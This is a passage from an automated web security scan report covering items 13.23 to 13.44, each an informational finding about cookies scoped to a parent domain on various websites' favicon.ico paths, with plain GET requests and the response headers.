Set-Cookie: SaneID=173.193.214.243-1301751214570006; path=/; expires=Tue, 05-Apr-16 13:33:34 GMT; domain=.americanexpress.com
Last-Modified: Wed, 21 Oct 2009 07:07:44 GMT
Accept-Ranges: bytes
Content-Length: 894
Cache-Control: max-age=1
Expires: Sat, 02 Apr 2011 13:33:35 GMT
Content-Type: image/x-icon

...[SNIP]...

13.23. http://www.apartments.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apartments.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.apartments.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 318
Content-Type: image/x-icon
Last-Modified: Thu, 10 Mar 2005 19:16:51 GMT
Accept-Ranges: bytes
ETag: "eef59cb6a525c51:0"
Server: Microsoft-IIS/7.5
Set-Cookie: userSite=Active|True@TotalNumberOfUsers|100@NumberOfBetaUsers|0@UserSiteType|Apt@BaseURL|www@SiteId|1@BetaNumber|169@RedirectURL|http://www.apartments.com@; domain=.apartments.com; expires=Sat, 02-Mar-2013 14:45:17 GMT; path=/
Set-Cookie: activitylogging=expirationday=3/31/2016 8:45:17 AM&lastactivitytime=4/2/2011 8:45:17 AM&visitid=22aa4494-a1e4-4ad2-a264-1d3adfed4348&visitorid=d943f403-d2ad-491a-ad99-f9674d3c3681&lastfrontdoor=APTS; expires=Thu, 31-Mar-2016 13:45:17 GMT; path=/
Set-Cookie: AptAff=e2277821e6304b3afb4cea5f8f0c0654980fee5bfc0e3c990502f3aacef349fa;Path=/
Set-Cookie: userSite=Active|True@TotalNumberOfUsers|100@NumberOfBetaUsers|0@UserSiteType|Apt@BaseURL|www@SiteId|1@BetaNumber|169@RedirectURL|http://www.apartments.com@; domain=.apartments.com; expires=Sat, 02-Mar-2013 14:45:17 GMT; path=/
Set-Cookie: activitylogging=expirationday=3/31/2016 8:45:17 AM&lastactivitytime=4/2/2011 8:45:17 AM&visitid=22aa4494-a1e4-4ad2-a264-1d3adfed4348&visitorid=d943f403-d2ad-491a-ad99-f9674d3c3681&lastfrontdoor=APTS; expires=Thu, 31-Mar-2016 13:45:17 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:45:16 GMT
Set-Cookie: aptspersistence=578884780.24576.0000; path=/

...[SNIP]...

13.24. http://www.automotive.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.automotive.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.automotive.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=kc4mq245jn1lcx55hwsqsuze; path=/; HttpOnly
Set-Cookie: UserPuid=2324458499622796901; domain=automotive.com; expires=Sat, 02-Apr-2061 13:40:51 GMT; path=/
Cache-Control: private
Content-Type: image/x-icon
Content-Length: 426

...[SNIP]...

13.25. http://www.autotrader.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.autotrader.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:47 GMT
Server: Apache
Set-Cookie: v1st=25A5F04B12A8896B; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1301750747268522; path=/; expires=Thu, 12-Mar-15 13:25:47 GMT; domain=.autotrader.com
Last-Modified: Tue, 15 Mar 2011 18:14:33 GMT
Accept-Ranges: bytes
Content-Length: 318
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: image/vnd.microsoft.icon
Set-Cookie: BIGipServerAT-Production_hhtp=209020426.61475.0000; path=/

...[SNIP]...

13.26. http://www.baidu.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.baidu.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.baidu.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:08 GMT
Server: Apache
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Set-Cookie: BAIDUID=732DA6B3A161553654A9C343A4882D17:FG=1; expires=Sun, 01-Apr-12 13:56:08 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
Last-Modified: Mon, 24 Jan 2011 11:52:05 GMT
ETag: "13e-49a963a8e0340"
Accept-Ranges: bytes
Content-Length: 318
Vary: Accept-Encoding,User-Agent
Connection: Keep-Alive
Content-Type: image/x-icon

...[SNIP]...

13.27. http://www.bidcactus.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bidcactus.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bidcactus.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:17:39 GMT
Server: Apache
Last-Modified: Fri, 01 Apr 2011 16:25:10 GMT
ETag: "7d40c4-47e-49fddda8b6580"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: image/x-icon
Set-Cookie: BALANCEID=balancer.www13; path=/; domain=.bidcactus.com
Via: 1.1 bidcactus.com

...[SNIP]...

13.28. http://www.bizjournals.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizjournals.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bizjournals.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:39:04 GMT
Server: Apache
Set-Cookie: bizj=YToxOntzOjM6IlVJTiI7czozMDoiMjkxNTE2MTg0MzRkOTcyNmY4Y2Y3Njg3MGZlZjhjIjt9%7C1301751544%7C6cb798d646d7838561076324272978f8ff136b64cfb9b8dd5c0d4c55c0436ed1; expires=Sun, 01-Apr-2012 13:39:04 GMT; path=/; domain=.bizjournals.com
Set-Cookie: bizj=YToxOntzOjM6IlVJTiI7czozMDoiMjkxNTE2MTg0MzRkOTcyNmY4ZDBiNThjNWNlMGIzIjt9%7C1301751544%7Cb769a95f8358eec5ae178a6877548f04d46f0bba7d768b809293bbbf75c88a93; expires=Sun, 01-Apr-2012 13:39:04 GMT; path=/; domain=.bizjournals.com
ServerID: 3
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 45605

<!DOCTYPE html>
<!-- tid: 105; lct: Wed Mar 23 15:40:16 2011 -->
<!--[if IE ]><![endif]-->
<html>
<head><title>The page you requested was not found | The Business Journals</title>
<base href="http://w
...[SNIP]...

13.29. http://www.buzznet.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buzznet.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buzznet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:25 GMT
Server: Apache
Set-Cookie: bncom=173.193.214.243.71371301751865415; path=/; domain=.buzznet.com
Last-Modified: Thu, 30 Sep 2010 19:44:38 GMT
ETag: "47e-4ca4e8a6"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: image/x-icon

...[SNIP]...

13.30. http://www.cisco.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cisco.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cisco.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.0
Last-Modified: Tue, 10 Jun 2008 19:13:16 GMT
ETag: "b8602b00"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:39:19 GMT
CDCHOST: ccows-sj-201
Content-Type: image/x-icon
Date: Sat, 02 Apr 2011 13:39:19 GMT
Connection: close
Set-Cookie: CP_GUTC=72.163.4.165.1301751559889702; path=/; expires=Wed, 26-Mar-36 13:39:19 GMT; domain=.cisco.com

...[SNIP]...

13.31. http://www.collegehumor.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegehumor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:35:37 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 13:35:36 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 13:35:37 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 13:35:36 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=2aaaf6d3dd05b89fe9a91fb542a542bf37833c97; expires=Fri, 01-Apr-2016 18:39:27 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=2aaaf6d3dd05b89fe9a91fb542a542bf37833c97; expires=Fri, 01-Apr-2016 18:39:27 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...

13.32. http://www.cornell.edu/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cornell.edu
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cornell.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:51:19 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l JRun/4.0
Last-Modified: Wed, 15 Sep 2010 19:11:24 GMT
ETag: "2da6bb-47e-49051187a3db1"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: image/x-icon
Set-Cookie: BALANCEID=balancer.cf068; path=/; domain=.cornell.edu

...[SNIP]...

13.33. http://www.directv.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.directv.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.directv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Length: 1150
Content-Type: image/x-icon
Last-Modified: Wed, 21 Nov 2007 16:56:17 GMT
Accept-Ranges: bytes
ETag: "80cea66e5f2cc81:7d9"
Server: Microsoft-IIS/6.0
Set-Cookie: TLTHID=DD21B83B4FE66273AF7ED4AC3335D73E; Path=/; Domain=.directv.com
Set-Cookie: TLTSID=DD21B83B4FE66273AF7ED4AC3335D73E; Path=/; Domain=.directv.com
Date: Sat, 02 Apr 2011 13:26:09 GMT

...[SNIP]...

13.34. http://www.discovercard.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.discovercard.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.discovercard.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:21 GMT
Server: Apache
Set-Cookie: v1st=D8BCADAE8D52A0E9; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.discovercard.com
Last-Modified: Thu, 26 Jun 2008 22:04:17 GMT
Accept-Ranges: bytes
Content-Length: 0
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Type: image/x-icon


13.35. http://www.eharmony.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eharmony.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.eharmony.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:19 GMT
Server: Apache/2.2.16 (Unix)
Last-Modified: Tue, 03 Mar 2009 02:00:31 GMT
ETag: "47e-4642d4cc30dc0"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=2592000
Expires: Mon, 02 May 2011 13:37:19 GMT
Vary: Accept-Encoding
Content-Type: image/x-icon
Set-Cookie: BIGipServerFront=3910078892.16671.0000; path=/
Set-Cookie: lbid=acad40db-aaea-469e-7b2c-2ecabfc46d1a;expires=Thu, 29-Sep-2011 13:37:19 GMT;path=/;domain=.eharmony.com;

...[SNIP]...

13.36. http://www.emedtv.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.emedtv.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.emedtv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:55 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: UT1=173.193.214.243.1301751595155213; path=/; expires=Tue, 30-Mar-21 13:39:55 GMT; domain=.emedtv.com
ETag: W/"1150-1196102204000"
Last-Modified: Mon, 26 Nov 2007 18:36:44 GMT
Content-Length: 1150
Connection: close
Content-Type: image/x-icon

...[SNIP]...

13.37. http://www.epinions.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.epinions.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.epinions.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:50 GMT
Server: Apache/2.2.14 (Unix) PHP/4.4.9
Cache-control: private
Set-Cookie: EPV_PgVwID=e060b1a6c3caf55e5af3d016; path=/; domain=.epinions.com;
Content-Length: 2494
Content-Type: text/html

...[SNIP]...

13.38. http://www.fedex.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fedex.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fedex.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 13:24:32 GMT
Content-length: 3638
Content-type: image/x-icon
X-ua-compatible: IE=EmulateIE7
Set-cookie: fdx_cbid=22185494081301750672092920271330; expires=Monday, 18-January-2038 21:14:07 GMT; path=/; domain=.fedex.com
Last-modified: Thu, 14 Feb 2008 18:25:33 GMT
Etag: "e36-47b4879d"

...[SNIP]...

13.39. http://www.fool.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fool.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fool.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Sat, 15 Jul 2006 14:05:56 GMT
Accept-Ranges: bytes
ETag: "07a65ca17a8c61:0"
Server: Microsoft-IIS/7.0
P3P: policyref="http://www.fool.com/w3c/p3p.xml", CP="IDC DSP COR CUR ADMa DEVa TAIa CONo HISa TELo OUR PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC IND"
Set-Cookie: Sookie=source=&fy=false&ybls=0; domain=.fool.com; path=/
Set-Cookie: Wookie=Ref=http%3a%2f%2fnone%2f; domain=.fool.com; expires=Sun, 03-Apr-2011 13:35:38 GMT; path=/
Set-Cookie: Tookie=T=04877517183428375666730643888134; domain=.fool.com; expires=Tue, 30-Mar-2021 04:00:00 GMT; path=/
X-Powered-By: ASP.NET
Set-Cookie: v1st=8D3DBA4B712DAFA2; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.fool.com
Date: Sat, 02 Apr 2011 13:35:38 GMT
Content-Length: 4710

...[SNIP]...

13.40. http://www.funbrain.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.funbrain.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.funbrain.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=0
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:27:15 GMT
ETag: "436-3ba36634b1fc0"
Expires: Sat, 02 Apr 2011 13:27:15 GMT
Last-Modified: Tue, 01 Apr 2003 03:28:07 GMT
Server: Apache
Set-Cookie: Apache=10.243.58.175.1301750835307007; path=/; expires=Sun, 01-Apr-12 13:27:15 GMT; domain=.funbrain.com
Content-Length: 1078
Connection: keep-alive

...[SNIP]...

13.41. http://www.gamehouse.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamehouse.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gamehouse.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:37 GMT
Server: Apache/2.2.11 (CentOS)
Last-Modified: Tue, 11 Nov 2008 01:40:48 GMT
ETag: "58b82a5-436-45b5ff805e800"
Accept-Ranges: bytes
Content-Length: 1078
Content-Type: text/plain; charset=UTF-8
Set-Cookie: NSC_xxx-hbnfipvtf=ffffffffaf16e33c45525d5f4f58455e445a4a423660;expires=Sun, 03-Apr-2011 15:07:42 GMT;path=/;domain=gamehouse.com

...[SNIP]...

13.42. http://www.guardian.co.uk/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.guardian.co.uk
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:58 GMT
Server: Apache
Set-Cookie: GU_MU=VFpjbFRncjZER01BQUJrWkhJMEFBQUhPfDY5VkZuRGVpTVd3ZzBJT0pFbVBrZ0E9PQ==; path=/; domain=.guardian.co.uk; expires=Tue, 30-Mar-2021 13:31:58 GMT
Last-Modified: Fri, 04 Apr 2008 16:07:11 GMT
Accept-Ranges: bytes
Content-Length: 895
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:31:58 GMT
X-GU-httpd: 06
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Vary: User-Agent
Connection: close
Content-Type: image/x-icon

...[SNIP]...

13.43. http://www.hayneedle.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hayneedle.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hayneedle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 No Content
Date: Sat, 02 Apr 2011 14:13:19 GMT
Server: Apache
Set-Cookie: SITE_ID=669;domain=.hayneedle.com;path=/
Set-Cookie: GLOBALBRANDTABDISPLAYFLAG=1;domain=.hayneedle.com;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: CFID=1845783;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: CFTOKEN=18555418;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: SID=168F9556%2DAFAA%2DD69D%2DBF662349017993E3;domain=.hayneedle.com;path=/
Set-Cookie: BRAND_SID=168F9564%2DBCFC%2D2008%2DF545EEB98C2F515F;domain=.hayneedle.com;path=/
Set-Cookie: GLOBAL_SID=168F9572%2DFF8F%2D4773%2D011E87EA6323CAED;domain=.hayneedle.com;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: SITE_ID=669;path=/
Set-Cookie: GEO_DATA=%3CwddxPacket%20version%3D%271%2E0%27%3E%3Cheader%2F%3E%3Cdata%3E%3Cstruct%3E%3Cvar%20name%3D%27POSTAL%5FCODE%27%3E%3Cstring%3E05672%3C%2Fstring%3E%3C%2Fvar%3E%3C%2Fstruct%3E%3C%2Fdata%3E%3C%2FwddxPacket%3E;path=/
Set-Cookie: SURVEYS=309%7C%7Bts%20%272011%2D04%2D02%2009%3A13%3A19%27%7D%7C0%7C0;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: SESSION_COUNTER=4310204;path=/
Set-Cookie: SIGNATURE=MWP5GCRJ3nTSpdoEL7gF10r6POmFuHsBTEquPge%2BNls2sE5V2f2bPn6ywNvybK6A;domain=.hayneedle.com;path=/
Set-Cookie: GLOBAL_CUSTOMER_ACCOUNT=%3CwddxPacket%20version%3D%271%2E0%27%3E%3Cheader%2F%3E%3Cdata%3E%3Cstruct%3E%3Cvar%20name%3D%27CUSTOMER%5FID%27%3E%3Cstring%3E0%3C%2Fstring%3E%3C%2Fvar%3E%3Cvar%20name%3D%27CUSTOMER%5FFIRST%5FNAME%27%3E%3Cstring%3E%3C%2Fstring%3E%3C%2Fvar%3E%3Cvar%20name%3D%27SIGNED%5FIN%27%3E%3Cstring%3E%3C%2Fstring%3E%3C%2Fvar%3E%3C%2Fstruct%3E%3C%2Fdata%3E%3C%2FwddxPacket%3E;domain=.hayneedle.com;path=/
Set-Cookie: SKU_COMPARE=;domain=.hayneedle.com;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: INITIAL_SESSION_LOGGED=1;domain=.hayneedle.com;path=/
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 22867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...

13.44. http://www.hiexpress.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hiexpress.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hiexpress.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix) Communique/4.0.4 mod_ssl/2.8.31 OpenSSL/0.9.8a
Content-Type: text/plain; charset=utf-8
P3P: CP="OTI DSP COR DEVa OUR NOR",policyref="http://dcs.ichotelsgroup.com/w3c/p3p.xml"
Last-Modified: Thu, 11 Jun 2009 15:08:05 GMT
ETag: "e6ba-47e-4a311dd5"
Accept-Ranges: bytes
Content-Length: 1150
Expires: Sat, 02 Apr 2011 13:36:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:36:17 GMT
Connection: close
Set-Cookie: TLTSID=2FD741865D2E105D041AB024DF96EAB9; Path=/; Domain=.hiexpress.com
